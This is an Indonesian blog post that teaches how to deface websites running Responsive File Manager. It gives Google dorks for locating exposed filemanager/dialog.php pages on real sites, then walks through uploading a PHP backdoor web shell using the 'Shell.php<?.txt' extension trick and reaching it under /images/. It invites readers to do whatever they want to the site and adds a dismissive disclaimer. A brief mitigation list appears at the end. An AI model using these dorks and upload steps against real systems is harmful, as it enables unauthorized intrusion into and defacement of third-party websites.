Deface Poc RFM(Responsive File Manager)
Kali ini aku akan kasih tutorial deface, poc RFM.
Apa itu RFM?
itu singkatan dari Responsive File Manager, yang dimna kita bisa mengakses web dari filemanager nya.
Apakah bug ini berbahaya?
Bahaya banget tentunya, ini bug yang sangat critical ya, karena kalo tidak di patch sama yang punya website atau admin, bisa saja hacker" masuk dan meretasnya.
Yaps, langsung saja ke tutorial nya
Seperti biasa sediakan dlu alat dan bahannya.
Hp, dork, Exploit, Shell backdoor Kelen.
Shel backdoor, Gak punya? Download
Dork?
inurl;//filemanager/dialog.php
inurl:/filemanager/ intext:”dialog.php”
inurl:/js/filemanager/ intext:”dialog.php”
inurl:/assets/filemanager/ intext:”dialog.php”
Kembangkan lagi dorknya, because rfm itu hanya dapat karena hoki saja wkwkw.
Seperti biasa kita nge dork dlu
Nah kalo udh ketemu target na kita langsung ekse ae, kasih Exploit di belakang domain
domain.com/filemanager/dialog.php
domain.com/asset/filemanager/dialog.php
Nah tekan titik3, terus klik +
Dan trus upload Shell backdoor kamu dengan ekstensi Shell.php<?.txt
Nahh cara akses shellna?
domain.com/images/shellmu.php
Duarr, shellmu done terupload
Bebas mau kamu apain webna
Intinya jangan lupa backup.
Bagaimana cara menutupi bug tersebut?
- Kalo kalo tidak tahu bisa lapor ke kontak admin web tersebut
- bisa juga menutupi dengan rename file dialog.php
- atau bisa juga mengubah .httacces nya
Note : Ini hanya sebuah pelajaran atau tips, jika kamu melakukan untuk tindakan jahat, itu bukan tanggung jawab kamu.
Sekian dri aku see u next time
Greatz?
All mem bx and you <3
){kind=link}
Posting Komentar untuk "Deface Poc RFM(Responsive File Manager)"